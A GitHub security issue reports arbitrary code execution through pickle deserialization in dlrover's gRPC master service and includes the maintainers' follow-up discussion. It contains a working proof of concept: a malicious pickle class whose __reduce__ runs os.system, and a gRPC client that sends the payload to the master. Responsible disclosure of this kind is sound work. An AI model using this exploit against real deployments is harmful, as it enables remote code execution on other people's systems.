Security Vulnerability Report: Arbitrary Code Execution via Deserialization in dlrover's GRPC Service #1400

12end · 2024-12-20T10:28:23Z

Summary

A critical security vulnerability has been identified in the dlrover project, specifically within the Python module python/common/grpc.py. The function deserialize_message is susceptible to a deserialization flaw when handling gRPC messages. This issue can be exploited by an attacker with access to the dlrover-master gRPC service running on port 50001, potentially allowing for arbitrary code execution and unauthorized system access.

Affected Components

dlrover version(s) affected: All versions up until the date of this report.
Component: python/common/grpc.py
Function: deserialize_message

Impact

The dlrover-master exposes a gRPC endpoint on port 50001 for worker nodes to connect. When this service is deployed in a Kubernetes cluster, the port is exposed as a service, making it accessible by any container within the cluster under default configurations. An attacker could exploit this vulnerability by sending a maliciously crafted pickle data through the Message's data field, leading to remote code execution upon deserialization.

Technical Details

The Message protocol buffer message includes a bytes field named data, which is intended to carry serialized Python objects using the pickle format. However, pickle is known to be unsafe for deserializing untrusted data as it can execute arbitrary code during the deserialization process.

Proof of Concept (PoC)

Below is a simplified PoC demonstrating how an attacker might exploit this vulnerability:
elastic_training.proto

syntax = "proto3";

package elastic;

enum TaskType {
  NONE = 0;
  TRAINING = 1;
  EVALUATION = 2;
  PREDICTION = 3;
  WAIT = 4;
  TRAIN_END_CALLBACK = 5;
}

message Response {
  bool success = 1;
  string reason = 2;
}

message Message {
  int32 node_id = 1;
  string node_type = 2;
  // pickle bytes.
  bytes data = 3;
}

service Master {
  rpc report(Message) returns (Response);
  rpc get(Message) returns (Message);
}

exp.py

import grpc
import elastic_training_pb2_grpc
import elastic_training_pb2

def get_request(url: str, file_path: str):
    with grpc.insecure_channel(url) as channel:
        stub = elastic_training_pb2_grpc.MasterStub(channel)
        
        with open(file_path, 'rb') as file:
            data = file.read()

        message = elastic_training_pb2.Message(
            node_id=1,
            node_type="some_node_type", 
            data=data
        )

        response = stub.get(message)
        return response

url = "10.111.5.152:50001"
file_path = "/tmp/payload"
response = get_request(url, file_path)

gen_pickle.py

import os
import pickle

class EvilPickle(object):
    def __reduce__(self):
        return (os.system, ("touch /tmp/pwned",))

pickle_data = pickle.dumps(EvilPickle())
with open("payload", "wb") as file:
     file.write(pickle_data)

command:

pip install grpcio grpcio-tools protobuf
python -m grpc_tools.protoc -I=. --python_out=. --grpc_python_out=. elastic_training.proto
python3 gen_pickle.py
python3 exp.py

By executing the above scripts, an attacker can create a payload that, when deserialized by the dlrover-master, will execute the command touch /tmp/pwned, creating a file at /tmp/pwned on the master.

Recommendations

To mitigate this risk, it is recommended that:

Implementation of RestrictedUnpickler

By implementing a custom unpickler that overrides the find_class method, you can enforce a whitelist of classes that are allowed to be instantiated during the deserialization process. This approach ensures that only trusted classes can be created, thereby reducing the attack surface.

authentication

The dlrover-master gRPC service should implement authentication and authorization mechanisms to restrict access only to trusted entities.

Best regards,

12end@cyberkl

The text was updated successfully, but these errors were encountered:

workingloong · 2024-12-22T09:18:34Z

Thanks for your suggestion. Can we mitigate this risk if we replace GRPC and pickle with HTTP and JSON? IMO, JSON is more safe than pickle.

12end · 2024-12-22T11:47:42Z

Replacing GRPC and pickle with HTTP and JSON can reduce the risk associated with pickle deserialization vulnerabilities. JSON is indeed generally safer as it doesn't have the same built-in ability to execute arbitrary code like pickle. However, it's not a silver bullet.Proper input validation and sanitization still need to be implemented carefully to prevent other types of attacks. Also, the overall security architecture, including access controls and authentication, needs to be reevaluated and strengthened. If the security of the master cannot be guaranteed, companies using dlrover may encounter the "insider" problem that Bytedance had before.
Of course, I don't intend to exaggerate the dangers and add workload to you or your team. I just raise the issue. It is up to you to decide whether to add various security measures. After all, this will consume some human resources and time.

merlintang · 2024-12-22T18:31:09Z

@12end thanks for investigating this issue, let our team to check this again.

merlintang · 2024-12-22T18:31:23Z

@samplise

12end · 2024-12-23T01:51:57Z

The deserialization code is used from here on e92fc20#diff-55f4adaa04015061f621cf129479695bfb877e1dad2d16c5caacb8c14959e7fc

12end added the report label Dec 20, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Security Vulnerability Report: Arbitrary Code Execution via Deserialization in dlrover's GRPC Service #1400

Security Vulnerability Report: Arbitrary Code Execution via Deserialization in dlrover's GRPC Service #1400

12end commented Dec 20, 2024

workingloong commented Dec 22, 2024

12end commented Dec 22, 2024

merlintang commented Dec 22, 2024

merlintang commented Dec 22, 2024

12end commented Dec 23, 2024

Security Vulnerability Report: Arbitrary Code Execution via Deserialization in dlrover's GRPC Service #1400

Security Vulnerability Report: Arbitrary Code Execution via Deserialization in dlrover's GRPC Service #1400

Comments

12end commented Dec 20, 2024

Summary

Affected Components

Impact

Technical Details

Proof of Concept (PoC)

Recommendations

Implementation of RestrictedUnpickler

authentication

workingloong commented Dec 22, 2024

12end commented Dec 22, 2024

merlintang commented Dec 22, 2024

merlintang commented Dec 22, 2024

12end commented Dec 23, 2024